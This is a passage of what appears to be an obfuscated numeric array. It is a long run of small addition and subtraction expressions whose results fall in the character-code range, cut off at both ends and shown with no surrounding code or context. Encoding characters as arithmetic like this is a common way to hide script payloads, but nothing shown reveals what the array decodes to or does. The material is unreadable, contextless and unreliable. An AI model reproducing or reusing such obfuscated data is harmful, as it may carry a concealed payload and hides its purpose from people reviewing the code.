40+59),( 44+ 47), (15 + 57), ( 28+ 71),(98 - 24),(7 + 77), ( 56+ 37),(18 + 98),(89 + 10), (47 + 29), ( 71+ 1),(38+58), (62-39),( 35+ 49), (99- 6), (9 +107),( 85+ 14), (81 + 10),( 21 +105), (91+ 5), (19 + 3),( 17+67),(74+19), (18 + 48), (91+ 8),(1 +90),( 47+ 79), ( 76 +20), ( 15 + 1), ( 29+ 55),(63 + 31), (70+ 34),(81+ 18),(65 +26), ( 51 +21), ( 3 + 96),(89 -17), (66 +18), (49+45),(93 +7),(11 +88),( 40 +36), (83+27), ( 44+52), (40+ 45), (72+ 12), ( 13+80),(96 -30),(62 +37),( 4+ 84), (59 + 13),(74 + 22),( 36 - 18), ( 33+ 51), ( 99 -6),(29 + 83), ( 35+ 64), (3+73), (48+ 78),(21 + 75), (98 - 80),(45 +39),( 99 - 6),( 72 + 28), ( 67+32), (59 +29),( 78+48), (78 + 21),( 80- 5),( 18+ 66), ( 28 + 65),( 69 +43),(74+ 25), ( 42+ 49), ( 28 + 98),(58 +41), ( 48+25), (90 -6), (74 +20), (47+61),( 82 + 17), ( 64+ 12), ( 38+ 88), (59 + 37), (77 +14),( 66+ 18), (58 + 35),(12 + 92),( 2+ 97), (85- 6), ( 69+ 57),(97 - 1), (82 +6),( 90 - 6),( 34+59), ( 70 +46),( 51 +48),( 84 + 4),(94+ 32),( 23+76),( 3 +75), ( 71 +13), ( 35+ 58), ( 92 -22), (43+56), ( 39+ 40), ( 31 + 95),( 23+73),( 82- 65), ( 24 +60), ( 20+ 73),( 31+ 39), (6+93),(61+ 18), (52 + 74),( 83 +16), (63 + 15), (81 +3),( 85+9),( 5+115),(61+ 38), (21+ 67),(41+ 85),( 6 +90),( 25 -7),(90- 6),( 66+28),( 59+ 57), (88 +11), (49 +41),(75- 3), (24 +72),( 82 -63), (26+ 58),( 24 +69),(17+49), ( 61+ 38), ( 5 + 85), (17 + 71),(82+ 14),(50 +41),(80 +4), (17+ 76), ( 35 +69),(61+ 38), (68 +23), (76+ 12), ( 73 +26), (34+44), (42 +42),( 31 +62), (92 + 20), (77+22), ( 86 -10), ( 25 +47), (17+79), ( 62 + 23),( 31+ 53),(84 + 9), ( 33 +83), (97+ 2), ( 77 + 11),( 78+10), (99 -3),( 39-23),( 66+ 18), (35 +58),( 80 + 20),( 6 + 93), ( 12 +76), (12 + 114), (18+81), ( 16+62), ( 62 + 22),( 2 +91), ( 78 + 22),(66 +33),( 78-2), (30 +96), (29 + 70), ( 74 + 4),( 25 + 59),( 93+1),( 9 + 111), ( 48 + 51),( 81+7), (66 +44), (83+13),( 27+ 64), (87 - 3), ( 72 +22), ( 85+ 15),(96 +3),( 29 + 62), ( 81 +7),(32+ 67), (15+59),(77 + 7), ( 7+86), (28 + 76), ( 71 + 28), ( 61 + 15),(23+49), (25 + 71), (86- 70),( 19 +65), (75+ 19), ( 64+44), (75+24),( 54+ 22),(74 + 52), (51 + 45),(14 + 71),( 96 - 12),( 69+ 24), (20+ 54), ( 91 +8), ( 81 - 5), (9 +101),( 15+84), ( 59+20),( 82+2), ( 26+67),( 99 +17),(32 + 67), ( 21 +69),( 50+22),( 17 +79), ( 44 + 44), (60+ 24), ( 30 +63),(77 + 39), ( 86 +13),( 8 + 68),(0 +110),(56 + 40),(53 + 32),( 67+17), ( 10 + 83), ( 86 +34),(65+ 34),(95 -4),(69 +57), ( 95 + 4), (89- 10), (18 +66), ( 8 + 86),( 83+ 17), (33+ 66), ( 26+ 62),( 95 - 23),( 2+ 94),( 37- 20), ( 80+4), (84 + 9), (25 +83), ( 17 +82),(61 + 29), ( 10+62), ( 34 +62), ( 35+ 56),(99-15),( 41 +52), ( 98+ 6),( 41+58), (30+ 46),( 80+ 46), ( 6 +93), ( 70+4),( 67 + 17), (28 + 65),(100-26),( 77+ 22), (83+5), (84+4), ( 35 +64),(59 +14), ( 53+ 31),(81+ 13), (10 +102),( 47+ 52), (93- 2),(52 +20), (1 + 98),( 46 +32), (99 -15),(86 + 8), ( 87+ 33),( 100 - 1),( 77+13), (19+69), (69 +30),( 2 + 73),(85 - 1), ( 90 + 3), ( 76- 6),(72+ 27),(77+14),(10+100),(65+ 31),(49+ 41),( 1 + 83), (62+ 32), (11 +97), (42+57),(38 + 50), ( 19+53), (45 +51),(9 + 13), (19+65),( 39+55),( 98 +2), ( 28+71),(99- 23),( 40+ 32), ( 100 -4), ( 34 + 57),( 28 + 56),( 6+ 87),(39+ 27),(36 + 63), (71+8), (88 - 16), (46+50), ( 70- 51),(91- 7),(96 -3), (42+66), (20+ 79), ( 31 +60),( 21 + 105),(39+ 57), ( 18-2),(62 +22),( 47 +46),( 45+ 21),( 93 + 6),( 86 -7), ( 4+ 122),( 44 + 52), ( 28- 9), (82 +2), (17 + 77), (41 + 63),(91+ 8),(55 +33), (15 + 57), ( 2+ 94), (74 - 51),( 5+ 79), (83 +10), ( 16 + 88),( 21+78), (95 -7),(41 +31),(90 +9), ( 79-4),(9+ 75), (82+ 11), (27+ 39),(3+96),( 0+79),(23 +49),(22+ 77),( 50+ 24),( 61+ 23),(99 -6),(22 + 52),(4 +95),(25+54),(67 + 21),(83+13), (69+22),(76 + 8), (11 + 82),( 88+ 8),(34+ 65), (61+29),(59+13),(81 + 18), (90- 16), ( 65+ 19), (100 - 7), (60+ 10), (41 + 58), (62+ 14), (55+17),( 96+ 3), ( 69 + 4), ( 83+ 1),( 67 + 26),(34 + 40),( 59 + 40),( 91-12),(99-27),(78 + 18), (15 +1),( 82 + 2),(51+42),(29 +37),(62+37), (32 +56),(40+ 70), (54+ 42), ( 70+ 18),( 65+ 19), (29+64),( 27+77),( 31+68), ( 88 -12),( 68+4), (28+ 71), ( 41+ 32), (52 +32),( 17 +76), ( 66+ 30),( 68+ 31), (83+5), (29+ 81), (15+ 81), ( 4 +14),(27+ 57),(85 + 8), (16 + 92),( 60+ 39), (41 +38),(46 + 80), (59+37), (76 -54), (65 + 19), ( 64 + 30), (49 + 55),(1 + 98), ( 16+ 60),(89+37), ( 21+78),( 31 + 47), (68+16), (48 +46),(95 +13),( 52+47),(22+ 54), ( 88 +22), ( 14 +85),(26 + 47), ( 8+76),(53 +41),100, (96 + 3),(95-16), ( 11+ 115), (80 + 16),( 99 -77),(24 + 60),( 37 +57),(25 +87),(34+65),(78 +10),( 1+71), ( 57 +42),( 56+ 18),( 21+63),( 35 + 58),(38+ 58), (55+44),( 87 - 11),( 54+72), ( 88+ 11), (54+ 20), ( 69 + 15),(19 +75),( 84 +36), ( 11+88), (46 +45), ( 52 +58), ( 29+70), ( 71 + 7), ( 29 +55), ( 50+ 43), ( 19+ 97),(11 +88), ( 57+ 31),(69 + 3),( 49+ 50),( 75+4),( 6+78),(96-2), ( 30+86), ( 77+ 22),( 64 +15),(87- 15), (12 + 87),( 44+ 31),(31 +53),(53+41), ( 92+ 24),( 4+ 95), (5 +86), (71 +17), ( 80 + 16),( 69- 47),(70+ 14), (14+ 80),( 48+ 68),( 21 +78),(89 - 1), (34 +76),( 26 +70),(54-32),(22+ 62), (30 + 64),( 82 +34), 99, (91-15), (67 + 5),(13 +83),(61 - 38),(54+ 30),(14 + 80),(44 +60), (52+ 47),(64 +15),( 28 +60),( 63 +33), ( 69-46), (86-2),( 71+23),( 56 + 44),(14+ 85),( 3 +85), (88 +38), (83+ 16), (21+53), ( 68+16),(31+63), ( 26+74),( 26+73),(40+51),( 92-20), (62+ 34),( 98-81),( 50 +34),( 61 + 32),(88+24), ( 4 + 95), (85+5),( 95 - 7), ( 14 +82), ( 45 - 26), (50 + 34),( 91+2), ( 41 +67),(31+68),( 39+51),( 16 +72), (88+ 8),(55- 36),( 80+ 4), ( 68 + 25), (57 + 43),(56+43), (50 + 26), (13+ 113),( 88 + 8),( 78 +7), (14 + 70), (6 +87), (16+ 92),( 17 +82), (14 + 76),( 62 +10), ( 5+91),(63 - 46),( 52+32),( 81 + 12), (96 + 8),( 11+88), (73+15), (73+ 53), (38+61),( 12 + 62),( 33+51),( 46 + 48),( 37 + 79),( 78+21),(8 + 68), (53 + 19), ( 51 + 48),( 63+ 9), ( 83 +1),(71+22),( 28 +72), ( 91+ 8),90, ( 94- 6), ( 82+14), (64-45),( 17+ 67), (30+64), (4 + 112), (93+6), (1 + 87),( 81 +45), (72+24), (55 -38), ( 0+84),( 29 + 64),( 53+ 13),( 87 + 12),(56 + 20),(77+ 33),( 12+ 87),( 24 +54), ( 62+22),(96 - 3), ( 76 - 10), ( 11 +88), ( 88 -9), ( 11+ 115), ( 53 +43), (59- 43),( 97 -13), (72+21),( 48+ 48),( 25 + 74),76,( 89+37),( 72 + 24),(100 - 9), (16 + 68),(87+ 6), (77+ 23),( 43 + 56), ( 86 + 4),(3 + 69), (2+97), ( 4 +69),(23+ 61),(85 + 8), (50 + 46),( 69+30), (62+ 26),( 85+ 25), ( 32+67), (65+ 9), ( 40+ 44),(34+59),( 25 +71), ( 89 + 10), (23+ 53),( 51+ 59), ( 97- 1),( 46 + 44), ( 24+ 60), ( 49+ 44), (96 -22), (73+ 26),( 75 +4), ( 29 +43),(50 + 46), (83- 67), ( 46 + 38),( 30 + 63), ( 71 +45),( 74 +25), ( 57 +34), (74+ 36), ( 51 +45), ( 41-18),(60+ 24),(26 +67), (69+ 39),( 70+29),(1+ 87), ( 84+ 4), ( 50+49), ( 6 +68), ( 44 + 40),(79+ 14),(24 + 46), (64 + 35), 76, ( 96 -24),(90+ 6),( 71 - 54), (69+ 15), ( 70+ 24), (2 +102),(29 + 70), ( 37 + 39), (82 +44),(68+28), ( 92-74), ( 93- 9), (61+33),( 41 + 79), (0 +99),(70+9), (34 +54),(92+7),( 18+ 60), (40 + 44), ( 37 +57),(80 +40), (34+ 65), (14+ 74), ( 31 +95),(60+36), ( 84-66),(89 - 5), (51 + 42), (12+62), ( 83+16),( 84- 8),(93 + 17), ( 58+38), (87+ 1),( 35+49),( 71 + 22), ( 62+58), ( 79+ 20), (42 +49),( 91 + 19), (67 +29), ( 55-38),(36 +48), (24+ 69),(0 +108), ( 9+ 90), (19 +72),(62+ 64), (91 + 8),(56 + 19), ( 55 + 29),(100 -6),( 90 + 14), (34+ 65),(18+ 72), (64+ 8), ( 81 + 15),( 94-76), (37 + 47),( 31 +62), (80+ 16),( 93+ 6),( 47+32), ( 44 + 82), ( 97- 1), ( 36 +49), (31+53),( 42 + 52), ( 12+ 92),(2 +97),(100- 12), ( 11 +77),( 85+14), ( 27+46), ( 72 + 12), ( 19 + 74), (87+ 33),( 3 +96), (61+27), (3 + 69),(69 +27),(30-12), 84, (28+66),( 21 + 87), ( 12+87), ( 36+ 52),( 24+ 48), (11 + 85), ( 1+ 89), (71+ 13),(45 +48), (20 +84), ( 100-1),(80- 4),( 66+ 60), ( 47 +49),( 72- 56),(59+25),( 25+69), (71+ 29), (72+ 27), ( 75+ 13), ( 15 +95),( 1+ 95), ( 94- 77),(65+ 19), (4+ 90), ( 79 +41), (72 + 27),(94-3), ( 27+ 83), ( 43 + 56),( 59 +19), ( 9+ 75),( 19+74), ( 95 + 1), ( 66+ 33),(52+39), (19 +91), (5 + 91),(54- 35), ( 37+ 47), (63 + 30),(39+81), ( 90 + 9),(29+62), ( 54+72), (70 + 29), (99- 21),( 57+27), ( 40+ 53),( 63+ 33),(42+57), ( 57+31), ( 27+ 83),( 28+ 68), (45- 28), ( 78 +6), (99- 6),( 53+ 21), (50+ 49),( 12 +79), (30+ 58),(61 +38),(54+ 24),(55+29), ( 84+ 9),( 2 +114), ( 30 + 69), ( 29+59),( 24+ 48),( 34 + 62),(45 - 29), (1 +83), ( 60+ 34), ( 85+ 23),(73 +26),( 86 + 2),(60 +50), (60+ 36),(98-75), (14+70),( 64 +29),( 42 + 66),(88 + 11), ( 78+ 10),(71+ 17),(13 + 83), ( 22-6),( 76+ 8),( 92+ 2), (34 + 70), (17+82), ( 53 + 35), (22+ 50),( 37 +59),( 69 - 51), ( 49+35),( 42 +51), (88- 14), ( 26+73),(78- 2), ( 2+124),(24+ 72),(66- 49),( 51 +33),( 8 + 86), ( 59 + 49), ( 23 +76),( 68 + 22), (95 - 23),(59+ 37), ( 64+ 26), ( 55+29),(62+31), ( 34+62), (41+ 58),(30+61), ( 70 +56),( 74 +25),(36+37), ( 11 +73),(35+ 58), (1+ 111), (71+ 28),( 81-5),( 19 +107), ( 69+ 30), ( 70+ 4), ( 21 +63),(46+ 47),( 62+8),( 2 +97),(4+ 72),(31 + 79),(49 + 47), (93- 76),( 14+ 70), (11 +82),(85+31),( 0 + 99), ( 49 +27), (26+84),(75 +21), (27 - 8),( 7+ 77), (62+ 31),( 52+ 18),( 100- 1), (99 -23), (94 +32), (49+ 47),(77- 61),( 68 + 16),(95 - 1),(61+ 39),( 10 + 89), ( 41 + 50), ( 15 +73), (9 +87), (55+ 35), (25+59),(59 + 34),( 100+12), (63+ 36), ( 48 +42),( 34 +54),(74+ 25),(37+41), ( 8+ 76), ( 46 +48), ( 81+39),( 5 + 94), (97- 21),(16 + 110), (97+ 2), ( 21 + 58), ( 69 +15),( 1+ 93),( 12+108), ( 17 + 82), (62 + 29), ( 33+ 77),( 70 +26), ( 57 -38), (43+41),( 16 +77), ( 38+36), ( 83+16),( 72 +7), ( 46 +42),(75+ 24),(31 +47),( 1+ 83), ( 90+ 4), (56 +44),(41 + 58), ( 37 +42),72,( 63+33), (49 -33), ( 5 +79),( 28+ 65),(99+ 21),(24 + 75), ( 86 + 4), ( 11 +77), (91 + 5), ( 47+ 43),(89- 5),(97- 4),(70+46),(3+ 96), ( 82 + 9),( 35 + 75),(10+ 86), ( 42-26), ( 60+24), (4 +90), (88 + 16),( 73 +26), ( 40+ 36), (63 +63),( 9+ 87), (65 - 49), (20 +64),( 90 + 3),(65 +5), ( 5+94),( 15 + 73), ( 43+29), ( 70 +26), (42+46),(7 +77), (53 + 40),(50+66), (12+ 87),( 24+52), ( 71+39),( 4 + 92), (43-26), (95- 11), ( 77 +17), (35 +65), ( 32+ 67),(69+ 10), ( 1 +87),(50+46), (55-39), ( 15 + 69),(98 -4), (98+6),( 100-1),( 74 + 17), ( 87 +23),(83 +13), (76 -53),(99-15), ( 20 + 74), ( 66 +34), ( 33+66), (74 + 17), (18 + 70), ( 46+50), ( 93 - 74),(43 +41),(81 + 13),(59+ 57),(93 +6), ( 9+ 70), ( 96 -8), (15+ 81),(36+54),(32+ 52), (12 +82),( 65 + 35), (42 +57), ( 98 -8),(41 + 31), ( 65+ 31), (37 +53), ( 72+ 12), ( 71 +22),( 31 +85),( 55+ 44),( 93- 5),(9+ 101),( 72+ 24),(2 + 88),(44+ 40),93,(44+ 68), (51+ 48),( 56 +23),(65 +7),(65+34),( 88 -16), (76 + 8),(35+ 59), ( 58+50), (18 +81),(5 + 86),( 36 +90), (4 +92),( 67 - 48),(33 + 51),( 32+61),( 54 +50),( 1+ 98),(35+41),(0 +110),(91 + 5),( 82 + 8),(49+35), ( 50 +43), ( 95-21), (80+19), ( 45 +31),(3 + 69), ( 48 +51), ( 70+2), ( 96 -12),( 32+61), ( 28 +76),( 5+94),(11 +80),(39+33), (67+ 29),(85+ 5),(16 + 68), (37 + 56),(70+ 34), ( 79 +20), (71 +20), ( 30+ 80),( 60+ 36),(18+ 73),( 15 +69),(36 +58), (55 +45), (9+ 90), ( 70+ 9),(78+ 10), ( 47+49), ( 21+ 1),(77 + 7), (11+ 82), (69+1), ( 46 +53),( 13 +75),(24 +48),(13 + 83),(70 + 20), (79+ 5),(72+21), (88- 14),( 60+39), (100 - 24), ( 46 +64),(9 +87),( 73- 50),( 65 +19),(50+44),( 41+67),(1 + 98),( 55+ 33),( 26+ 46), (49 +50), (58 + 20),( 15+69), ( 94 -1),(37 +79),( 51 + 48),(81 + 7), ( 41 + 85), ( 54 + 42),( 91- 73), (69 + 15), (65+28),(96 - 30), ( 66 + 33), (94 - 4),( 87-15),( 32 +67),( 32+46),( 87-3), ( 5 + 88), (12 +96), ( 66+33), (89-13), (8 + 102),( 18+81),(84- 9), ( 75+ 9), (3 + 90), (14+106), ( 76+23),(69 +22), ( 48 + 78), (60 + 36),( 86 + 5),( 56+ 28), (49 + 45),(94+14),( 75 + 24), ( 77+ 11),( 63+ 47),( 53 +43),(33 -11), ( 31 + 53),( 18 +75),(13 + 61), ( 27 +72),( 31 +60),( 1+ 87), (51 + 45),( 38-21),( 58+ 26), (81 + 12),(44 + 30), (32 + 67), (62 + 29), (64+62), ( 70+ 26), (3+ 14), ( 50+ 34),( 0+94), ( 81+ 31), ( 58 +41), ( 47+ 41),(18+108),( 82+14),( 56-40),( 17 + 67), (51+42), ( 50+ 50),(62+ 37),(7 + 84),( 96 + 14), (75 + 21),(19 -1), (44 + 40), ( 71 + 23),(79 + 41),(42 +57), ( 19+72),(77+ 11),(60+ 36), ( 33+55),(75 +9), ( 54 + 39),( 47+65), (100- 1),( 69 + 7),(79+31),(48 +48),(28 + 60),( 17+ 67),(54 + 39), ( 60 +40),(32+ 67), ( 71+ 20), ( 87-15), (1 +95), ( 69 - 46),(96 -12), 93,( 82 + 34),(27+72), ( 37+39),(74 - 2), (82 + 14),(44 - 28),( 4 +80), (73+20), ( 5+103),(53+46), (79+ 12), (99 - 11),( 100 -1),(86- 12), (65+ 19),( 27+67),(37+ 79), ( 29 + 70),( 72 + 19),(70+2),(47+ 49), ( 70+18), (13+ 71), ( 43 +50), (96- 22), ( 52 + 47), (39 +49),( 97 + 13), ( 57+ 39), (41+50),(44+ 40),( 22+ 71), ( 65 + 1),(97 + 2),( 66+ 24), ( 68+ 4), (79+17), (15 + 70), ( 99-15), ( 99- 6),(100- 30), (5+ 94),( 56+20),(26 + 84), (35 +61),(12+4), (49+35), ( 30 + 63), ( 32 + 38),(24 + 75), (71+17), (30+ 42), ( 9+ 87), ( 17 +1),(54+30), (45 +48), ( 40+ 26),(84+ 15), (48 +40),(61 +27),(10+89), ( 70+ 2), ( 35+49), ( 49+45), (75+41),( 82+ 17), (88- 9), ( 79+ 47),(62+ 34),(76 + 14), ( 10+74),( 88 + 5), (60 + 36),(17+ 82),( 85-9),(9 + 101), ( 11 + 85),( 67 -44),( 41+ 43),(45+49), ( 48+ 60), ( 82+17), (52+39),( 46+ 80),( 12 + 84),16,(86 -2),(3+91), (7+105),( 62 + 37), ( 64 +26),( 31+41), ( 14 + 82), (37-21), ( 14 +70),(51 +43),( 48+ 72),(66+33), (2 + 86),( 16 + 72), (71 + 28), (61 +11), (72+12),( 86+8), (28 + 88),( 94 +5),( 38 + 52), (38+ 50), ( 13 + 83),(51 +40), ( 94- 10), (30+64), ( 80+ 32), ( 6+93), ( 42+ 49), ( 91 +35), ( 90+9),(48+31), ( 6 +78),( 11 + 83), ( 92+ 20), ( 33+66), ( 20+ 56),( 90 + 36), ( 21+78),(20+ 53), ( 54+ 30), (56+ 38),(89 +23),(16+ 83), (85+ 6),( 19+ 69),( 80+16),( 91 -73), (87- 3),(26+67), (88 +12), (83+ 16),( 93-5),88, ( 79 +17), (54 +37), ( 19+65),( 30 +63), ( 82+ 30),(90+9),(67 +12),(41+ 31),( 8+ 91),(68 + 4),(98 -14),( 85+ 8),( 8+108), ( 84 + 15), (18 + 72),( 1 +87),( 79 +17), (46 -29),(36 + 48),(94-1), (71 + 41), ( 89+10), ( 1 +89),( 97 -9), ( 9 +90),(71+ 2),( 42 + 42),(72+ 21),( 11+59), (17 +82),( 79 +11), ( 16 + 72), (58+ 38),(62+ 28), (99- 15),( 11+ 82), ( 66+46),( 90+ 9),(62+ 29), ( 84 - 12),( 49 +50), (66 + 8),( 40 + 44),( 31 +62),(81 + 19), ( 12+87),( 57+ 34),(94- 6),( 76+ 20),( 97 - 81),( 25+ 59), (60+33), (47 + 53),( 60 +39),(45 + 31), (28 + 44),(16+ 83), (11+ 67),( 49+ 35), (65 +28), ( 92 + 8),(87+ 12), ( 63 +25), ( 46+ 26), (5 + 91), (5+85), (57+27),(53 + 40), ( 87 +9), (18 +81),( 0 +91),(46+ 26), ( 50 +46), (53+ 38),( 5+ 79),( 68 + 25), (88+28),( 86+ 13),(8+ 71),(50 +76),(68+ 28), ( 61 - 42),(81+3),( 5 + 88), (100 -30), ( 86 + 13), (79+12), ( 55 + 33),(74+25),(35+ 40), (87 -3), (28+ 66), ( 67+53),(28+ 71), (9 + 79), (15 + 111), (76 +20),(92 - 76), ( 17 + 67), ( 89+4), ( 62 + 46),(98+ 1), (43+ 48),(82+ 28),(40+59), (34 + 39), ( 42+ 42),( 81+12),(12 +92),( 85 +14),( 3+ 85), (11 + 99),( 3 + 93),(52 - 34),( 73 + 11),(85 +9),(45+ 67),(68+31),(73+15), ( 7 +119),(8+ 88),(78 -61), (0+84), ( 91 +3),( 77 +27), (55 + 44), ( 96-20), (7 + 119),(10+ 89), ( 65+ 13),(88-4),(73+21),(40 +72), (90+9),(90-14), (13 +59),(85+11),( 62-40), ( 55+ 29),(88 + 5), (87+ 9), (91 + 8), ( 34 +45), (13 +113),( 48 + 48),( 53+37), (82 +2), (37+56), ( 70+ 30), (56+43), ( 63 + 16),(54 + 18),( 49 +50),(34+ 39), ( 99-15), (61+32),(59+ 41), ( 70+29), ( 62+ 29),(10 + 78), (92+4),18,( 52 +32), 93,(9+65),( 97+ 2),(28+48), (31 + 79),(67 + 29),( 26 +64),(47+ 37), ( 52 +42), ( 89 + 31),(62 +37), (62+ 26),( 29+81), (29 + 67),(39 + 49), (78+6),( 42 + 51),(56+44),(96 + 3),( 34 + 42),(80- 8), (55 + 41),( 18 +4),(33+51),( 90+4), (79 +33),(10+ 89),( 30+ 49), (42+46), ( 94+ 5), (65 +13),( 91 -7), ( 18+ 76),( 26 +94),(35+64),(45 + 34), (23 + 103), (91+ 5),(25- 2), ( 79+ 5),(62+32), (31 + 81), ( 48+ 51), ( 18 +61), (4 + 122),( 86 +10),( 40+ 48), ( 11+73), ( 12+ 81), (85 +31),( 55+44), (11+68),(98 - 10),(55 + 44), ( 9+64),( 88 -4), ( 31+62), (85+ 27),(81 + 18),( 49 +39),( 58+14),(85+ 11),( 31+59), ( 12 +72), (85+ 8), (28 + 80), (62+ 37),( 75 + 15), ( 27 + 61), (53 + 46),( 39+ 34),( 66+18), ( 30+ 63), ( 32 + 64),( 63+36),( 26+ 62),( 0 + 110), ( 85+11),(67-48), (19 +65),(82+11), (89+ 31), ( 47+ 52),(17 +73),(6 + 82),( 7+ 89), (17 + 73), ( 35 + 49),( 13 + 80), (14+56), ( 42 + 57), (30 + 61),( 15 + 73), (2+94),(49+ 36),( 53+ 31), (60+33),(56+ 14),(53+ 46),(12+76), ( 31 + 41),( 29+ 70),(90- 18),( 59 +25),(52+ 42), (16+ 88),( 72 + 27), ( 93 - 2),(58+30), (45 + 51), (97-78),(8 + 76), (81 +12), (54+ 16),(42+ 57), (88+ 3),( 73+ 15),(39+60), (30+45), ( 24 +60),(15+78), ( 86 + 30), (73+ 26), ( 20+56),( 65 +45), ( 35+61), ( 6 +11), ( 59 +25),(21 +73), (87+ 29), (41+58), (53+37), (33 + 55),(0 +96),(1+ 15), ( 3+ 81),(28 +65), ( 11+109),( 50+ 49), ( 81 +7),(18+ 108),(0 +96),( 46 + 39), (94 - 10),(26 + 68), ( 63 + 57),( 53+ 46),(65+ 23),( 62 +26),(29 + 70), ( 25+ 50), (46 +38), ( 15+ 78), (20+ 84), (57 + 42),( 31 +57),( 38+ 50), (67+32), (28+ 45), ( 52 + 32),(24 + 70),( 14 + 98),( 53+46), (54+25), 72,( 54 + 42),91,(6 +78), ( 94 -1), (58 +62),( 71 + 28), ( 12 + 67),( 6 + 82), ( 78 +18),(30- 12),( 61 + 23),(59+ 35), (71 +37),(68 + 31), (3+ 76),( 84 +4), (14+ 82), (46- 27), (0 +84), ( 66 + 28), (35+65), (70+29),(12+ 67), ( 27 + 61),(49 + 50), (11+62), (7 +77),( 51 + 42), (95 - 25),( 59 +40),(10 + 69), (38+ 88),(16 +80),( 25 + 65), ( 72+12), (31+ 62), ( 29 +83),( 8+ 91),( 55 + 36), ( 99- 11),(90 +6), ( 86- 64), (98-14),( 69+ 24), ( 63+ 57), (66+33), ( 87 - 11),( 47+63),(73+ 23), ( 33 + 58),(20+ 64),( 9 + 85), ( 82 +26),(17 + 82),(84-5), (82 -10),(73+23), (51- 34), (77 + 7),( 12 + 82), ( 53+ 59),( 86+13),(57+31),(59 + 67),( 20+ 79), ( 46 +29), ( 51+ 33), ( 43+50), ( 43 + 61), (56+ 43),(10+ 81), ( 62 + 26), (87 + 12), (37+37), (2 +82),( 10+ 84),( 85+31), (37+62), (15+ 73), (69 + 19),( 60+ 39),( 83- 5),(60+24), (19 + 74),( 74 + 34), (58 +41), (60+19), (20 + 52),( 42+54),( 43 - 25),(55 + 29),(36+ 57),( 24+ 46),(48+51),( 46 +42),(4+122),(23 + 73),( 19 + 69),(70 +14),( 79 +14), (87 +33), (25+ 74), (81 +10), (59+ 51), ( 76+23),(60 +14),(57+27),(94 -1),( 90+30), ( 85 +14), (72 + 7),(64+24), ( 51 +48),( 43+29), ( 94 -10),( 45+ 49), ( 35 +81), (30+ 69), ( 13 + 63),( 68 + 42), ( 67 + 29),( 36 +49), (23+61),( 29+64),( 7+ 59),( 30 + 69),( 78+ 1), (32+56), (84 + 12),(15 +3), (63+21), ( 12+ 82),( 24+92), ( 25 + 74),(10+ 80), ( 66 +6),(98 -2), (82- 59),(9 + 75),( 15+ 78), ( 100 +12), 99, (46 +45),( 1 + 125), (58 +41), ( 82 -3), (83 + 1),(69+ 24),( 69 +35), (71+28),(38 + 52),( 51 + 21), (57 +42), ( 100 - 22), ( 56 +28),(9+ 84), (4+ 70),( 6 +93),(95 - 7),(42 + 30),(51 +48), (5 + 70),(4 +80),( 88+ 5), (32+ 68),( 61+38), ( 71+ 20), ( 18+108), ( 80+ 16),(54 + 37),(85-1), ( 45+ 48), (69 +1), ( 92 + 7),( 14 +74),(50+60),( 83 +13), (46+42),( 55+29),( 83 + 10), (40 +76), ( 93 + 6),( 41+50), ( 95- 23), ( 98 + 1), (24+ 54),(97 - 13),( 25+ 68),( 2+72), (84+ 15),( 12 + 78),(82+ 6), ( 41+58),(28+ 44), ( 58+26),( 3+90), ( 46 + 24), (43+56), ( 54 + 25),(71 + 55), ( 77 +19),( 83-64),(48+ 36),( 29+65), ( 62+42),(92 + 7),( 11 +68),(12+ 76), ( 35 +61), (63 +28),(30+54),(23 +70), ( 19 +51),(86 + 13), ( 68+ 23),(2 +108), (64 +32),( 52 -34),( 60 + 24), (24+ 69),( 77 - 11),(0+ 99), ( 81 -2), (11 + 115), (76+20), ( 46 +39), ( 80 +4),( 30 +64),(79 +25), (85+ 14), (46 +45), ( 19+91),(82+14),( 43 + 45), (76 +8),(65+28), ( 22 +90), (19+80), ( 44+ 32), (90+ 20),99,( 34 +40),( 57+ 27),( 77+16),( 17+95), ( 41+ 58), (96 - 8),(14 + 74), (77 + 19), (86- 1),( 56 +28),( 7 + 86), (38 + 74),( 61 +38),( 85- 9), (80+ 46), ( 24 + 72),17, (22+62),( 15+79), ( 96 +12), ( 69 + 30), ( 83 +5), (83 -11), (87 +12),( 69 + 3),( 71 + 13),( 3 + 90), (35+ 73), (70 + 29),88,( 86+2), (98-2),(82+ 3), (96 - 12), (92 +1), (99 + 17), ( 4 + 95),(14 + 74), ( 30 +42),( 70+26), ( 74- 58), ( 99- 15), (15+ 78),( 6 +110), (92 + 7),(32+59), ( 61 +11), ( 54+42),( 94- 6),(96 - 12),(25 + 69), (84 +20), (70 + 29),( 13+63), ( 88+22), ( 95+4), (45 + 30), (80 +4),( 100 - 7),( 98+ 10),(54+45), (62+14), (65+61), ( 58 +38),( 51-29), (31+53),( 90 + 3),( 70+42),( 40+ 59),( 75 +1),( 32 +94), (3 +93),( 95-79),( 85 - 1),( 63 + 30), (80+ 36),(15 + 84), ( 50+ 26),(18+ 108),( 64+ 35), (35 + 44), (12 + 72),(22+72), (44+56),( 28 +71), ( 42+ 37), ( 23 +65),( 92 +4), (48 - 30),( 5 + 79), ( 10 + 83),(91 + 5),(96 +3), (65+ 26), ( 46+ 42),( 46+50), (18+67), ( 59 +25),( 83 +10),(48+ 26), ( 71 +28), ( 43 +48),(56 + 54),(94 +5),( 65+9),( 90-6), (6+88),( 84 + 24), ( 25+74), ( 10+ 81), (49 +77), (40+ 56), ( 5 + 80), ( 53 + 31),( 67+26),( 16+100),( 37 + 62), (35+41), (15+111), (72+ 24), (32+ 56), (10 + 74), ( 20 +73),(22 +44), ( 18+81),( 85+6),( 84 +26), ( 77+22), ( 56+16),(14 + 70),(45 + 48),( 33+ 63), ( 43+ 56), (60 + 28),(17+ 109), ( 30 +69),( 93-20), (94 - 10), (3+ 91), ( 73 + 35),( 98 +1), (71+17),( 1 + 125), ( 64 +35), ( 19+60),( 93 - 9), ( 50 +43), ( 23 + 81),( 2+97), ( 60 +31), (45+ 81),(4 + 95),(41+ 34),( 2+ 82), ( 15 +79),(39 +61), (14+ 85), ( 55+33),( 90+ 20),(14+ 82), (97- 12), ( 49 + 35), (81+13),( 5+95),( 25 +74), (71 +5),( 60+ 50), (78+ 21),(31 +48), ( 78+ 6), (29 +65),( 63+57),(30+ 69),(61+ 27), ( 77 + 33),(84 + 15), ( 47 +28),(86- 2), (76+ 18),( 10+ 102), ( 38 + 61), ( 97 -6), (28 + 98),( 43 +53),(0 + 18),(42+ 42), ( 1+ 92),( 30 + 78),(51 + 48),(92-1),(50+ 60), (76+ 23), (81-2), (40+ 44), ( 79+ 14), (44+26), ( 36+63), ( 89+2),(83+5), ( 13 + 86),(30 + 42), (85- 1),(39 + 55),(3 +97), ( 62+ 37),( 68 + 22), (52+ 20),(5+ 91), ( 70+ 20),( 62+ 